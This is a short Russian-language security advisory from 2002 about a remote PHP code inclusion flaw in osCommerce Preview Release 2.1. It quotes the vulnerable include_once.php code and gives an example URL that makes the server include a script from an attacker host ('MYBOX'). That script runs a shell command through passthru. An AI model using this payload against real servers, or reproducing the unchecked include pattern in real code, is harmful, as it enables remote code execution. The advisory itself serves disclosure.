Security Lab

Внедрение PHP кода в osCommerce

Дата публикации:20.06.2002
Всего просмотров:4809
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: osCommerce – открытая реализация e-commerce. Уязвимость в программе позволяет удаленным атакующим включать произвольный PHP код в существующие страницы. osCommerce поставляется с файлом /catalog/includes/include_once.php, который содержит следующий код:
<?
  if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
include($include_file);
  }
?>
URL типа http://SERVER/catalog/inludes/include_once.php?include_file=FILE_WE_WANT_TO_INCLUDE, позволяет включить произвольный код. Например просмотр содержимого директории:

http://SERVER/catalog/inludes/include_once.php?include_file=http://MYBOX/a.php,где

--- a.php ---
<? passthru("/bin/ls")?>
------------- 
уязвимость обнаружена в osCommerce Preview Release 2.1
Ссылки: PHP Source Injection in osCommerce